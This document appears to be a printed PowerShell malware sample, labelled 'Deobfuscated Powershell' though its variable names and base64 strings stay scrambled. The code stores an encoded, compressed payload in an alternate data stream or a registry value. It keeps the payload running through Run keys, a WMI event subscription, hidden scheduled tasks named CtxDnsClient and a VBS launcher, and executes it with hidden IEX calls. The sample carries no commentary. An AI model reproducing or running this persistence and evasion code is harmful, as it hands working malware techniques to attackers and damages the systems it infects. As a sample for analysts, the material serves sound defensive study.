Deobfuscated Powershell

1.  
2. function _____/\_/\/\__/=\/(${_/=\/\/=\__/=\/\__})
3. { ${____/=\/\/=\__/=\} = New-Object System.IO.MemoryStream;
4.  ${/=\_/==\/==\__/\/} = New-Object System.IO.Compression.GZipStream(${____/=\/\/=\__/=\}, [System.IO.Compression.CompressionMode]::Compress);
5.  ${_/\/\/=\/=\/=\___} = New-Object System.IO.StreamWriter(${/=\_/==\/==\__/\/});
6.  ${_/\/\/=\/=\/=\___}.Write(${_/=\/\/=\__/=\/\__});
7.  ${_/\/\/=\/=\/=\___}.Close();
8.  ${___/=========\/\_} = ${____/=\/\/=\__/=\}.ToArray();
9.  return [System.Convert]::ToBase64String(${___/=========\/\_});
10. }
11. function _/==\/\/=\/\____/=(${_/=\/\/=\__/=\/\__})
12. { ${_/\/\____/\_/==\/} = [System.Convert]::FromBase64String(${_/=\/\/=\__/=\/\__});
13.  ${____/=\/\/=\__/=\} = New-Object System.IO.MemoryStream;
14.  ${____/=\/\/=\__/=\}.Write(${_/\/\____/\_/==\/}, 0, ${_/\/\____/\_/==\/}.Length);
15.  $null = ${____/=\/\/=\__/=\}.Seek(0,0);
16.  ${/=\_/==\/==\__/\/} = New-Object System.IO.Compression.GZipStream(${____/=\/\/=\__/=\}, [System.IO.Compression.CompressionMode]::Decompress);
17.  ${/===\___/\/===\/\} = New-Object System.IO.StreamReader(${/=\_/==\/==\__/\/});
18.  ${__/=\/\/\_/=====\} = ${/===\___/\/===\/\}.readtoend();
19.  return ${__/=\/\/\_/=====\};
20. }
21. function _/=\/\_/\__/\/====
22. { [CmdletBinding()] Param(
23.  [Switch]
24.  ${____/\/\/==\__/\/\},
25.  [Switch]
26.  ${___/\/==\__/\/\/==},
27.  [Parameter(Position = 0, Mandatory = $True)]
28.  [String]
29.  ${___/=\______/==\/=},
30.  [Parameter(Position = 1, Mandatory = $True)]
31.  [String]
32.  ${___/\/\/\__/\/===\},
33.  [Parameter(Position = 2, Mandatory = $True)]
34.  [String]
35.  ${____/\/=\_/\_/\_/\},
36.  [Parameter(Position = 3, Mandatory = $True)]
37.  [String]
38.  ${____/\/\_/=\/=\___},
39.  [Parameter(Position = 4, Mandatory = $False)]
40.  [String]${____/\_/==\_/==\__}
41.  )
42.  ${_/\_/\/\/\_/\/===} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SAA0AHMASQBBAEEAQQBBAEEAQQBBAEUAQQBNADEAYQBiAFcALwBiAE4AaABEACsANwBsAC8AQgBHAGMAWQBxAG8AYgBHAGoANQBtAFUAcgBHAG4AZwBZAGwAVwBaADIAZwBMAG0ARgBtAHcAUwBiADcAUQBTAEIATABEAEcASwBhAGwAdAB5AEoATABwAHkAbAB1AGEALwA3ADQANgBrAC8AQgBMAEwAMgBkAHEAUwAzAFkASQBnAGQAawBUAHgAdQBlAFAAZAB3ADcAdgBqAFMAKwAwAGgAOAA5AE4AbwB5AHQAOQBjAHcAOAA5AHUAOAAzAEwAMwBFAHYANQBjADQAOQA5AEgAMABpAFQAVgA2AGwARwBsAFYAcgB5AHgAMgB4AFQATgBsAC8AaQBKADcANABvADMAZgByAFYAcQAxAHUAQwBjAHoAWABuAGoASgBQAGEAVABJAEkAcgBEAHEAegBkAHYATAB1AEkASQB2AHIATgBHAGkALwBFAHoAbgBzAEkAegBhADMAQwBjAHgASgA5AFkAeQBxAEgAeAB0AHoAUwBaAHUARgA3AEcAZgBqAHAAUQBiAFMAOQA4ADYAcwBhADAAZABVAEIANwBJAFoAMwBoAFoANwAvAHIATwBwAFEAMgBtAHkAOQBzADIAOQA3ADUAZABuAGgARwBYAFkAQgAxAEsATwBzAGkAZgBJAGMATwBjADUAZAByAGgATwAvAGwAYgBrAFoAYgByAHcASABXAEMARAB6AEEAMwBkAE4AVwBqAHcANQBEAEkALwBCADkANgBvADcAUQBPAEgAMABLADgARwAxAEsAZwA1AHgAcQAwAHoAdwBFAE4ANwBaAHkAaABEAFQAaABWAG8AKwBpADMAYgBzADAAUQBMAGUAMgBPADkAUgBEACsATgBZAEYAMQBhAFcAOQBJAEcAVwBYACsAbQBiAHMAegBrAEoAdwBLADIAZwBkAFUAQwBQAHcAWAB1AGoAZQBvAFQASAA2AFoAbwB3AEQATQAvAFkATwAyAGUASwBaAG0AVgBJAEIAZABmAGMARgA1AHcAVQBwAEwANgBpAHYAawBaAFQAQwBFAEQANwAxAGMAaQBPAEcANgBYAFgAZABWADcAUQA5AGsAdgBCAG8ARwBBAHIALwB0ADAANQAxAHcAUQBlADUATwA2AGEAdABrAFEAbwBHADYAMQBQAEsAUABxAHIAYwB6AEcASwBmAFIAMABsAE0ASQBEAHgAZgBYAG8AdAA0ADMAUgBUAEIAKwBuAHIAWABxAGoAMQBjAGkAMwAvAFUARQA5AEgAKwB1AEUATgBxAGQATQBaAHYAMwA1ADAAMQBhAC8ARgBzAFAATABZAHIARAA2AFQAMgBVAEIAcgBuAG4AOABrAEMAUgB4AFYAbwBSAFIAbgB5AGEAVgBNAEsAawBPAG0AagBRAG4AaAA2AC8AMABDAGkARwAyAEkAcABTAGEAUQBlAE0AeQBLAGsAawBUAHAAOQA5ADUAYQBzAFAAbgBiAHMAQwBuAG4AWQBCAG0AYQBkAG4AdgB4AEoAcQBuAEUAMgBUAHAATABSAGIARQByAHEAZAB6AE8AVwAzAHYAUAA3AEsAVwB2AHkATwBTAGUAbAB3AHkAdgBBAHEAMgBUAHYAbAB4ADkAZgBFAFoAdAA4AEoAaABrAGIATQA1AC8AWABNADIARgBRAFUAcAA5ADYAbgBMAE0AMABKAGwAWAB3AGoAWAAvAHIAcABWAGYATwAzAEgASAAyADkAbQB6AEkAZQArAFMAeABRAHQAZwA0AFkAMwBwAFYAKwBtAHAAVgB0AHEAaABRACsAcgBpAGUAVABjAGMAUgB0AHoAYQBRADcASQBGAHoAQgBXAGoAUgBqAFYAWABlAGoAZAAyAEIAeQA1AFEAUABuAGkAcwBMAHkAagBnAHkAcwBJAEQARAA5AFEAOQBlAEgAQwBRAFQAVQB1ADkANAA4ADIAZwB5AG0ANABEAFgAUwAxADYAMQBHADMANAB5AGkANwBsADkASgBVAGMARwB2ADcANwBIAC8AZAB2AHYASwAxAFYAWQBRAEUAcQBSAE0AaQA2ADMAMgB2AFAAegArAHgAbQB2AHkAeQBtADQAWQByADIAbgBmAGYAOABqADYANgBXAE0AegA0AEEAMQBaAFMAbwBkAFYAUgA2AFgASQBZAEgARgB2AGwAVQBEAFcAaABaAHoAWABNAFMASABBAGwAUwBPAC8AUgAzAEwANgArACsASABIADQARwBVADUATwB3ACsANAAyAHoAUwBPAEgAMwBmADYATABCAEoAawB0ADcARAA2AEoAawAzAEUAVABOADkAOQAxAEkASwBVAHYAYgBaAHYAZAB6AGEAOQBUAGkAWgBUAEYATwBXAFoAUwBDACsAMABlAHAASABVAHcAbABpAGwAVQBuAGYASQBZAFAAeQBmAGkAdgBmAE8AeABBAG8ASQBTAG8AVwBUADIAdwBaAGQANABvAHAASgB1ADMANwB6AEUAQwBrADkARAAvAFMAQwBHAGEAWgBWAFQAYQBNAGIAWQBBAE4AMABVAGMAYQBiADkAcwByAHgAKwBNAGsAWQAxAGIAUgB2AEkAaQA5AEkAdgBRAHUAbgBQADUAMAAwAEkAMwB6AGgASwBhAHAAZAB5AC8ANgBLAFQAOABXAFoAbABoAG0AZwBmAE4AawBMAFEAZQBVADQAZAB0AHIAbgBnADcAWQB1AHEAZABsADgAQgBHAGQAawBFAGkAbwB6AGEAYQBVAGoAVgB5AHoASABPADYAMwBjAEcAVgB6AHoATQBxAFkASgBYAHIAdABFAEcAZQBuAFYATwBIAEcANwB5AHcATwArAGEAMwBRAFIAaQBTAE8ATABlAFkAOABZADIAeABrAE8AVAB1AE8ALwBiAC8AZwA2AFYAdgBtAHIAegBOAFYAawBtAFYAWABoAFIAVgBKAGkAMgBlAFkAKwBvAEYANQB3AGYATgBNAFgAYgBIAFMAWQBvAEIAbABjAGgAbwBBAEYALwBDAEUAeABjAEUAcQAwADgAbwBBADEAbgBnADAAVABzAEkASQBtAEoAUgB4AEwAKwBVAFEAbAByAHcAbwBCAHYAZgA0AGsAMABBAG0ATABQAHkAZQBUAEMAWQBRAHMAUgBaAHQARwBVACsAbQBpADAAYQBaAGUAWgBHAEQAaABjAFgATwBiADEARQBQAGEARwAxADAAWgBwAHoATgByAHcAcABWAG0AMAB0ADEAcwBaAGEAQQBnAGcARgBqADYARwBDAFkASgBPAE0AcgB3AFgAYQBoAHAARQBpAGcAMQA0AHEALwB0AFIAcwBQAE0AdgBPAEsAVwBWAGMAeABTAHMAMwA2AFIARABqAFEATwA1ADAAeABVAFAATwBiAFMANwBLAEwAMwBQADAAawBhAHQAVABRAC8AWQBpAEYANQBJAGYAUQBuAGQATAAyAEsAWgBaAG0ANQAvAGkAYwBVAFYAVwA3AGsAawBIAEsAYgBxADUASQAyAFkAagBzAEkAMABJAHEAbwBrAGoANgBvAGIAUQBaADcAYwBIAG0ARQBTADgAeQBsACsAawBGAGUAUwA5ADAAOQA3AEMASwBEAFUASQBqAFYAUwB6AEEANwA2AE4AcABEAEIAWABKAHMAQwBDAFAAYQBmAHQARQByAHYAZgAxAHIAaAA0AEEAZQBrAHAAYgBvAFYAdwBVAEcAbABnADkANQBHADUASwAyADcANQBhADkAMgBoAGQAagBQAGUAUQBwAHEAQgBwAHoANAB6AE4AWQBRAEYANABTAEYAcwBuAGEAcQAyAHYASABSADcAVwBtADcAZQA0AEkASgBTAHIATgBxADAAdQBsAGQAQQA1ADkAVQBJAFQAMABCAEUAYQB3AFkAegBXAE8AZQA1AE8ATQBQADEATQBBAFcAaQBZAC8ASQBuAGMATwBqAEQAZwB5AGkANAB1AFkAWAB1ADAATAA1AGkAQwBTADEAbAAzAGcAdAB0AG4AKwB1AEEAegBOAEUAagBQAGsAUABZAGgAYQBwAC8ATAA3AFQATAA5ADIAZwBmAEMATwBLACsAbABXAHcAMQBzAEgAMwBSAEIAVwA0AGoAcgBQAFUATgB4AFAAYwBmAE4AagB3AHUANQBFADYAcQBYADcAMwAyAGMAUwB1ADEAUQB1AGwAVQB2ADMALwB1AEMANwB4ADIAbAB0AFYANwBvAEwAcwBhAFcANwBuAEwAbgBXAGEAKwA5AEEAVgA3AFkAMgBWAEMAYQA3AHEAdgBrAEoAcABPAGQAVgBzAE0ARQBBAHIAcQBqADMASwBrADkAagB3AFkAaABiAG0AcgAzAFQATwAxACsAQgByAGkANQBDAGkAWABlADAATgBBAG0AWAA0AGgAVgBBAEQAVQB5AGoAVQBMAE0AUwBBAGwAbAArAGwAMABLADAASQBuAFkAKwBUAFQARQA5AFIAQgBqAFMANQBkADYAKwBoAE4AZQBQADgAZgB6AG8AZABkAEcAWQBvAHMANAB2AEIAbQBaAEsAQwA0AEEAKwBrAEMAVQBvAHMASQBnAFgAZAB5AEMAegAzAFYAdQB3AFkAZgB1AEgATgAwAG4AOAA2AGoAKwBSAEkAZABMAEEARwBDAEoAcgA3ADkARwBCACsAZwBEAEwAUAA4AEQALwBZAGMASABRAFkANwA1AHMAeQBNAEQAcgBuAGIAbwBPAGQAcQBaAG0AYgBHADMAcAA0AG8ANgBlAFoAcQBsAEgANwA2AEwAQQBUAGUAUgBoAFkAVgBlAHcAMwBpADQAbgBtADQANQBwAGwAWQBXAEEAUAA4AEoANABlAFUAMAAwAHAANABxAHYARgBEAE8AMABzAEQATQBnAHQASABMADMAYgA4AE0AdwBnAE0AcABCAFcAcwBDAC8AWgBHAFIAZABVAEYAegBLAE8AaQBZAEEAVwBpAHgARQAzAE8AZwBBAG8AQgB1ADYARAB1AHgAegBOAFgAUABjADQARABtAG0ARAA4AE4ARgBSAFYATQA4AEwAeAByAHkATgA2AHYAeABKAEcAcQAvAG8AQQBMAC8ATgA3AEgATQBOAFgAWABuAHkAYgBBAHYAbwBtADQAbgBXAEMAbQBlAEIANQBTAFcAVgBRAHcAWQA3AGMAVAA5AGsAUQBKAHEAdAArAGQAUQAxAHkARAB0AG4AMABUACsAWABPAEkANgA4ADkAVwBaAHEATABTAEcAbwBxAHMAVAA0ADMAZABCAHMAbAB4AEoAWABlAGkAOQBsAHQATQB3AEkAOQB3ADgAdgB2ADYANAA4AG8AUQA5AHgAUQBoAEcAagBKAEQAUABGAGYANwBpAHIANgBCACsAMABOAGkAWgAzADEAawBJAHEANABNAHMAWABpAEcANgBlAE8AWABiAE8ATQBVAGgAMQA1AGYAYwBRAG4AaQBPADUAMwA2AEwAZwA0ADkAMQBLAGsASABDAEMAbAB1AFcAKwBTADMAMABaAGoASgB3ADQAMwBpAEwAbwBYAFEAcABEAGcAYQBoAGkANwA0AHEAbgBOAFUAKwBiAEkANwBHAFkAWAA2ADYAZwBoAHEAYwBkAEMAeQBlAGQARwBFAFYARgBkAFAAagBCAHIAUABHAEsAVwA2AGsAUABPAFoATABFAC8AWQAxACsANQBkAG0AQgBHADcASQBhADUATQBTAHIAUABzAFkAZQBNADgAagBTAGEAVwByAFMANABCAGwASwBpAEcAbAB3AEIAMABsAGQATQA1AHAAagAxADUAdABVAGYAWQBRAG8AeQB2AG4AbwAwAFoAbQA1AEoANgB4AHYAdwBrAEQAagBJAFEAdABrAGEAaABLAEIAWQBVADIAagA5ADAAbgBDAFcAaABEAGcAOABjADkAQwBLAEIASABqAHkASwBaADAAeQBNAFcAYgBoAC8ANgB4AEEAVwB4ADMAeABTADkAQgBkAHcAUgBYAG8ATgBiAFMANAB2AEoAQwBpAGUAYgB2AFgAYQAyAGkASABpAHYANgBJAEwAeQBBAEQAOQBGAFUAZgBNAGkAVgBOAGkANQBIAG0ANwBGAEsARAB3ADEARABuAHIAcABzAHgAMQBZAHEAbQBiAEkAcAB1ADkAMABWAFQAVgBLAHAAZwB2AEQAcwByAG4AcwBqAEIAeABTAGMAKwBsAGUAWQB0AGoANgBlAEkAbQBBAHEAcQBFAGwANQBIAEsAZQBsAFgASQB0AG8AaQB4ADUAZQAxAEYAagB5AGMAeQBLAHEAUQAwAG4AcgB4ADgAQwBRADIASwBsAG0AZgBQADAAdgBKAHcAaABaAFEALwBPAHoAWQBlAGUAagA3ACsAdwAxAHcANgA0ADgAbgAwAGIASQBXAEoAdwA1AFIANQBvADgAVwA5AEkAZgBnADkAeABxAHQARAAyAEEAVABmAGIANgBMAFkARwA0AC8ARgA4AFgARgBsAGMAVwBEADYAVwBQAGsAYgBMAGcASgBNADcAdQBRAHMAQQBBAEEAPQA=')));
43.  ${/=\____/=\/===\/=} = _/==\/\/=\/\____/=(${_/\_/\/\/\_/\/===});
44.  ${__/\/===\_/==\_/\} = $env:programdata+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABXAGkAbgBkAG8AdwBzAA==')))
45.  ${_/\/\__/=\_/\__/\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQALgBkAGwAbAA=')))
46.  ${/==\___/\/====\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQALgB2AGIAcwA=')))
47.  ${__/==\/=\_/\/\/\_} = "${__/\/===\_/==\_/\}`:${/==\___/\/====\_/}"
48.  if(${____/\/\/==\__/\/\} -eq $True)
49.  { ${/=\__/\/==\/==\__} = "logic ${___/=\______/==\/=} ${___/\/\/\__/\/===\} ${____/\/=\_/\_/\_/\} ${____/\/\_/=\/=\___} ${____/\_/==\_/==\__}"
50.  ${_/=\/\/\/\_/\/\/\} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
51.  if(${_/=\/\/\/\_/\/\/\}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
52.  { ${_/\/\___/==\/\/\/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgA=')))
53.  ${/=\_/\/\/=\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAFwA')))
54.  }
55.  else
56.  { ${_/\/\___/==\/\/\/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwA=')))
57.  ${/=\_/\/\/=\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAFwA')))
58.  }
59.  ${/=\/=\/\__/\_/\/\} = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
60.  if(${/=\/=\/\__/\_/\/\} -gt 2)
61.  { sc -Path ${__/\/===\_/==\_/\} -Value ${/=\____/=\/===\/=} -Stream ${_/\/\__/=\_/\__/\}
62.  ac -Path ${__/\/===\_/==\_/\} -Value ${/=\__/\/==\/==\__} -Stream ${_/\/\__/=\_/\__/\}
63.  }
64.  else
65.  { ${_/\/\_/=\/=\_/\_/} = ${/=\____/=\/===\/=} + "`n" + ${/=\__/\/==\/==\__}
66.  ${/==\_/\__/\/\_/==} = _____/\_/\/\__/=\/(${_/\/\_/=\/=\_/\_/})
67.  New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name CtxDnsClient -PropertyType String -Value ${/==\_/\__/\/\_/==} -force
68.  }
69.  ${_/=\/\/\/\_/\/\/\} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
70.  if(${_/=\/\/\/\_/\/\/\}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
71.  { ${_/=\/\_/=\____/==}=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQAXwBGAGkAbAB0AGUAcgA=')));
72.  ${/==\___/=\/=\/\_/}=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQAXwBjAG8AbgBzAHUAbQBlAHIA')));
73.  gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
74.  gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
75.  gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
76.  ${_/\/\___/=\_/\/\/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class __EventFilter -Arguments @{Name = ${_/=\/\_/=\____/==}; EventNamespace = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAEMASQBNAFYAMgA='))); QueryLanguage = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBRAEwA'))); Query = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAF8AXwBJAG4AcwB0AGEAbgBjAGUAQwByAGUAYQB0AGkAbwBuAEUAdgBlAG4AdAAgAHcAaQB0AGgAaQBuACAAMwAwACAAdwBoAGUAcgBlACAAdABhAHIAZwBlAHQASQBuAHMAdABhAG4AYwBlACAAaQBzAGEAIAAnAFcAaQBuADMAMgBfAEwAbwBnAG8AbgBTAGUAcwBzAGkAbwBuACcA')))}
77.  ${/===\/=====\/\/\/} = ""
78.  if(${/=\/=\/\__/\_/\/\} -gt 2)
79.  {  ${_/=\___/=\/=\/\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class CommandLineEventConsumer -Arguments @{Name = ${/==\___/=\/=\/\_/}; ExecutablePath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA'))); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|Out-String)`""}
80.   ${/===\/=====\/\/\/} = "IEX `$(Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|out-string)"
81.   ${/=\_____/\/\/=\__} = "IEX `$(gc -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\} ^|Out-String)`""
82.   ${___/=\/\/\__/\/\/} = [System.Text.Encoding]::Unicode.GetBytes(${/=\_____/\/\/=\__})
83.   ${/==\_/=\______/==} = [Convert]::ToBase64String(${___/=\/\/\__/\/\/})
84.   schtasks.exe /F /create /tn CtxDnsClient /tr "powershell.exe -WindowStyle Hidden -e ${/==\_/=\______/==}" /sc onidle /i 30
85.  }
86.  else
87.  {  ${_/==\/\/\_/\/=\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).CtxDnsClient);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
88.   ${___/=========\/\_} = [System.Text.Encoding]::Unicode.GetBytes(${_/==\/\/\_/\/=\/=})
89.   New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name Part -PropertyType String -Value ${_/==\/\/\_/\/=\/=} -force
90.   ${/===\/=====\/\/\/} = "IEX `$((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).Part)"
91.   ${_/=\___/=\/=\/\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class CommandLineEventConsumer -Arguments @{Name = ${/==\___/=\/=\/\_/}; ExecutablePath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA'))); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/===\/=====\/\/\/}`""}
92.   schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/===\/=====\/\/\/}`"" /sc onidle /i 30
93.  }
94.  Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class __FilterToConsumerBinding -Arguments @{Filter = ${_/\/\___/=\_/\/\/}; Consumer = ${_/=\___/=\/=\/\_/}} | out-null
95.  if(${___/\/==\__/\/\/==}){  IEX ${/===\/=====\/\/\/};
96.  }
97.  }
98.  else
99.  { if(${/=\/=\/\__/\_/\/\} -gt 2)
100.  {  ${/===\/=====\/\/\/} = "IEX (Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|Out-String)"
101.   IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${__/==\/=\_/\/\/\_}`""
102.   IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/===\/=====\/\/\/}`"`",0 >> ${__/==\/=\_/\/\/\_}`""
103.   New-ItemProperty -Path ${/=\_/\/\/=\____/=} -Name CtxDnsClient -PropertyType String -Value "wscript ${__/==\/=\_/\/\/\_}" -force
104.   schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe ${__/==\/=\_/\/\/\_}" /sc onidle /i 30
105.  }
106.  else
107.  {  ${_/==\/\/\_/\/=\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).CtxDnsClient);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
108.   ${___/=========\/\_} = [System.Text.Encoding]::Unicode.GetBytes(${_/==\/\/\_/\/=\/=})
109.   New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name Part -PropertyType String -Value ${_/==\/\/\_/\/=\/=} -force
110.   ${/===\/=====\/\/\/} = "IEX ((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).Part)"
111.   IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${__/==\/=\_/\/\/\_}`""
112.   IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/===\/=====\/\/\/}`"`",0 >> ${__/==\/=\_/\/\/\_}`""
113.   New-ItemProperty -Path ${/=\_/\/\/=\____/=} -Name CtxDnsClient -PropertyType String -Value "wscript ${__/==\/=\_/\/\/\_}" -force
114.   schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe ${__/==\/=\_/\/\/\_}" /sc onidle /i 30
115.  }
116.  if(${___/\/==\__/\/\/==}){IEX "wscript ${__/==\/=\_/\/\/\_}";}
117.  }
118.  }
119.  else
120.  { ${/=\__/\/==\/==\__} = "logic ${___/=\______/==\/=} ${___/\/\/\__/\/===\} ${____/\/=\_/\_/\_/\} ${____/\/\_/=\/=\___} ${____/\_/==\_/==\__}"
121.  IEX "${/=\____/=\/===\/=} `n ${/=\__/\/==\/==\__}"
122.  }}
123. _/=\/\_/\__/\/==== $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB3AHcA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB3AHcA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBhAGkAbAA='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AG8AcAA='))) -____/\/\/==\__/\/\